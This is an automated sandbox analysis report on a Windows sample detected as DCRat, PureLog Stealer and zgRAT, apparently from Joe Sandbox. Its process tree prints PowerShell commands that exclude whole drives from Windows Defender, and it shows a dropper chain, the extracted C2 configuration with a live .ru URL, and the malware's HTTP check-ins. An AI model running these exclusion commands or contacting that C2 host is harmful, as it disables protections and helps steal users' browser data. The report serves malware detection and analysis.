Windows Analysis Report
HMhdtzxEHf.exe

Overview

General Information

Sample name: HMhdtzxEHf.exe (renamed because original name is a hash value)
Original sample name: bc8116e0b506345bf1de248886a52f86.exe
Analysis ID: 1584128
MD5: bc8116e0b506345bf1de248886a52f86
SHA1: 21362fd44f8f157523e4c2616c0c66eb5ba05db0
SHA256: 805bb6fbb8749ea5e5d1c0bc61216a96ad6a981d825e13220d34843f8936cd1d
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates processes via WMI
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • HMhdtzxEHf.exe (PID: 7100 cmdline: "C:\Users\user\Desktop\HMhdtzxEHf.exe" MD5: BC8116E0B506345BF1DE248886A52F86)
    • wscript.exe (PID: 6352 cmdline: "C:\Windows\System32\WScript.exe" "C:\ChainbrowserNet\xBHgrB3tvHV8NGEL8mvcEkNRMDmhEvT5nxGDfikGQwdW.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 3120 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ChainbrowserNet\Fsnwm63YgSc5SNPvS73lTcLZ0fh.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • serverDll.exe (PID: 5300 cmdline: "C:\ChainbrowserNet/serverDll.exe" MD5: 9F9F04273C02095B1603F3B01EB15D53)
          • powershell.exe (PID: 3868 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 5416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1368 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6376 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2000 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ChainbrowserNet/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4592 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 4852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5216 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3264 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7184 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7212 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7248 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7280 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 2288 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • powershell.exe (PID: 7352 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7388 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7416 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\Memory Compression.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7436 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainbrowserNet\backgroundTaskHost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7476 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7520 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Videos\System.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7532 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\upfc.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7544 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainbrowserNet\serverDll.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7508 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ff39zMQKS5.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 8820 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 4816 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • backgroundTaskHost.exe (PID: 6020 cmdline: "C:\ChainbrowserNet\backgroundTaskHost.exe" MD5: 9F9F04273C02095B1603F3B01EB15D53)
  • aaHgUfBgYBljMPbLmzgS.exe (PID: 7804 cmdline: "C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe" MD5: 9F9F04273C02095B1603F3B01EB15D53)
  • aaHgUfBgYBljMPbLmzgS.exe (PID: 8132 cmdline: "C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe" MD5: 9F9F04273C02095B1603F3B01EB15D53)
  • Memory Compression.exe (PID: 7936 cmdline: "C:\Recovery\Memory Compression.exe" MD5: 9F9F04273C02095B1603F3B01EB15D53)
  • Memory Compression.exe (PID: 8060 cmdline: "C:\Recovery\Memory Compression.exe" MD5: 9F9F04273C02095B1603F3B01EB15D53)
  • serverDll.exe (PID: 8260 cmdline: C:\ChainbrowserNet\serverDll.exe MD5: 9F9F04273C02095B1603F3B01EB15D53)
  • serverDll.exe (PID: 8028 cmdline: C:\ChainbrowserNet\serverDll.exe MD5: 9F9F04273C02095B1603F3B01EB15D53)
  • System.exe (PID: 4108 cmdline: "C:\Users\Default User\Videos\System.exe" MD5: 9F9F04273C02095B1603F3B01EB15D53)
  • System.exe (PID: 1804 cmdline: "C:\Users\Default User\Videos\System.exe" MD5: 9F9F04273C02095B1603F3B01EB15D53)
  • cleanup
{"C2 url": "http://495112cm.renyash.ru/vmLineMultiUniversalwp", "MUTEX": "DCR_MUTEX-Rvg35dAJFEhTQBLXgCcP", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
HMhdtzxEHf.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
HMhdtzxEHf.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\ChainbrowserNet\backgroundTaskHost.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\ChainbrowserNet\backgroundTaskHost.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Recovery\Memory Compression.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.1665452904.000000000650D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000003.1665910452.0000000006E15000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000004.00000000.1722682939.0000000000332000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000004.00000002.1976233128.0000000012D03000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: serverDll.exe PID: 5300 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.3.HMhdtzxEHf.exe.6555cf3.0.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.3.HMhdtzxEHf.exe.6555cf3.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.3.HMhdtzxEHf.exe.6e5dcf3.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.3.HMhdtzxEHf.exe.6e5dcf3.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.3.HMhdtzxEHf.exe.6555cf3.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default User\Videos\System.exe", CommandLine: "C:\Users\Default User\Videos\System.exe", CommandLine|base64offset|contains: , Image: C:\Users\Default\Videos\System.exe, NewProcessName: C:\Users\Default\Videos\System.exe, OriginalFileName: C:\Users\Default\Videos\System.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Users\Default User\Videos\System.exe", ProcessId: 4108, ProcessName: System.exe
Source: File created, Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ChainbrowserNet\serverDll.exe, ProcessId: 5300, TargetFilename: C:\ChainbrowserNet\backgroundTaskHost.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ChainbrowserNet/serverDll.exe", ParentImage: C:\ChainbrowserNet\serverDll.exe, ParentProcessId: 5300, ParentProcessName: serverDll.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 3868, ProcessName: powershell.exe
Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ChainbrowserNet\xBHgrB3tvHV8NGEL8mvcEkNRMDmhEvT5nxGDfikGQwdW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ChainbrowserNet\xBHgrB3tvHV8NGEL8mvcEkNRMDmhEvT5nxGDfikGQwdW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\HMhdtzxEHf.exe", ParentImage: C:\Users\user\Desktop\HMhdtzxEHf.exe, ParentProcessId: 7100, ParentProcessName: HMhdtzxEHf.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ChainbrowserNet\xBHgrB3tvHV8NGEL8mvcEkNRMDmhEvT5nxGDfikGQwdW.vbe" , ProcessId: 6352, ProcessName: wscript.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ChainbrowserNet/serverDll.exe", ParentImage: C:\ChainbrowserNet\serverDll.exe, ParentProcessId: 5300, ParentProcessName: serverDll.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 3868, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-04T11:07:37.094780+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 104.21.38.84 | 80 | TCP

AV Detection

Source: HMhdtzxEHf.exe, Avira: detected
Source: http://495112cm.renyash.ru/vmLineMultiUniversalwp.php, Avira URL Cloud: Label: malware
Source: C:\ChainbrowserNet\backgroundTaskHost.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ChainbrowserNet\xBHgrB3tvHV8NGEL8mvcEkNRMDmhEvT5nxGDfikGQwdW.vbe, Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\Memory Compression.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\Default\Videos\System.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ChainbrowserNet\serverDll.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\Ff39zMQKS5.bat, Avira: detection malicious, Label: BAT/Delbat.C
Source: 00000004.00000002.1976233128.0000000012D03000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: DCRat {"C2 url": "http://495112cm.renyash.ru/vmLineMultiUniversalwp", "MUTEX": "DCR_MUTEX-Rvg35dAJFEhTQBLXgCcP", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: C:\ChainbrowserNet\backgroundTaskHost.exe, ReversingLabs: Detection: 65%
Source: C:\ChainbrowserNet\serverDll.exe, ReversingLabs: Detection: 65%
Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe, ReversingLabs: Detection: 65%
Source: C:\Recovery\Memory Compression.exe, ReversingLabs: Detection: 65%
Source: C:\Users\Default\Videos\System.exe, ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\HBQeAgEO.log, ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\HQmlqEFC.log, ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\LQcCJUsI.log, ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\LVZlWyIJ.log, ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\OQqtADLy.log, ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\THRskbyw.log, ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\axWajGSg.log, ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\biYRKJQS.log, ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\ermiNMVU.log, ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\fknZLDhU.log, ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\hYrhxRdS.log, ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\hrAYEvpK.log, ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\hzjriePQ.log, ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\jRHPiNPQ.log, ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\kOiXENdL.log, ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\nQUGZwiG.log, ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\oOwOvwxB.log, ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\riqoYKNp.log, ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\sNXxZlqq.log, ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\uhRxJqon.log, ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\xEzwJIdo.log, ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\zkTmQnyh.log, ReversingLabs: Detection: 50%
Source: C:\Windows\Vss\Writers\Application\upfc.exe, ReversingLabs: Detection: 65%
Source: HMhdtzxEHf.exe, Virustotal: Detection: 73%
Source: HMhdtzxEHf.exe, ReversingLabs: Detection: 71%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\ChainbrowserNet\backgroundTaskHost.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe, Joe Sandbox ML: detected
Source: C:\Recovery\Memory Compression.exe, Joe Sandbox ML: detected
Source: C:\Users\Default\Videos\System.exe, Joe Sandbox ML: detected
Source: C:\ChainbrowserNet\serverDll.exe, Joe Sandbox ML: detected
Source: HMhdtzxEHf.exe, Joe Sandbox ML: detected
Source: 00000004.00000002.1976233128.0000000012D03000.00000004.00000800.00020000.00000000.sdmp, String decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"System drive"}}
Source: 00000004.00000002.1976233128.0000000012D03000.00000004.00000800.00020000.00000000.sdmp, String decryptor: [["http://495112cm.renyash.ru/","vmLineMultiUniversalwp"]]
Source: HMhdtzxEHf.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: HMhdtzxEHf.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: HMhdtzxEHf.exe
Source: C:\Users\user\Desktop\HMhdtzxEHf.exe, Code function: 0_2_00A3A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00A3A69B
Source: C:\Users\user\Desktop\HMhdtzxEHf.exe, Code function: 0_2_00A4C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00A4C220
Source: C:\ChainbrowserNet\serverDll.exe, File opened: C:\Users\user
Source: C:\ChainbrowserNet\serverDll.exe, File opened: C:\Users\user\Documents\desktop.ini
Source: C:\ChainbrowserNet\serverDll.exe, File opened: C:\Users\user\AppData
Source: C:\ChainbrowserNet\serverDll.exe, File opened: C:\Users\user\AppData\Local\Temp
Source: C:\ChainbrowserNet\serverDll.exe, File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\ChainbrowserNet\serverDll.exe, File opened: C:\Users\user\AppData\Local

Software Vulnerabilities

Source: C:\Windows\SysWOW64\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Network traffic, Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49736 -> 104.21.38.84:80
Source: Joe Sandbox View, IP Address: 104.21.38.84
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: global traffic, HTTP traffic detected:
  POST /vmLineMultiUniversalwp.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
  Host: 495112cm.renyash.ru
  Content-Length: 344
  Expect: 100-continue
  Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
  POST /vmLineMultiUniversalwp.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
  Host: 495112cm.renyash.ru
  Content-Length: 384
  Expect: 100-continue
Source: global traffic, HTTP traffic detected:
  POST /vmLineMultiUniversalwp.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
  Host: 495112cm.renyash.ru
  Content-Length: 2520
  Expect: 100-continue
Source: global traffic, HTTP traffic detected:
  POST /vmLineMultiUniversalwp.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
  Host: 495112cm.renyash.ru
  Content-Length: 1844
  Expect: 100-continue
Source: global traffic, HTTP traffic detected:
  POST /vmLineMultiUniversalwp.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
  Host: 495112cm.renyash.ru
  Content-Length: 2520
  Expect: 100-continue
  Connection: Keep-Alive
                                    Source: global traffic HTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 495112cm.renyash.ru Content-Length: 1844 Expect: 100-continue Connection: Keep-Alive
                                    Source: global traffic HTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 495112cm.renyash.ru Content-Length: 1832 Expect: 100-continue Connection: Keep-Alive
                                    Source: global traffic HTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 495112cm.renyash.ru Content-Length: 2516 Expect: 100-continue Connection: Keep-Alive
                                    Source: global traffic HTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 495112cm.renyash.ru Content-Length: 248156 Expect: 100-continue
